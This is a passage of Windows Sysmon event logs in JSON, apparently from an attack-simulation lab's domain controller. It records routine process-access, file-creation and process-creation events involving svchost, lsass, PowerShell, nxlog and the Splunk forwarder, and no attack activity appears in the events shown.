0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.475","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.490\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.490","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.506\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1wbfohok.mao.ps1\r\nCreationUtcTime: 2020-08-01 06:55:01.506","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.506","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1wbfohok.mao.ps1","CreationUtcTime":"2020-08-01 06:55:01.506","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.522\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.522","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.537\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.537","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.537\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.537","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-001055160700}\r\nProcessId: 4700\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-001055160700}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
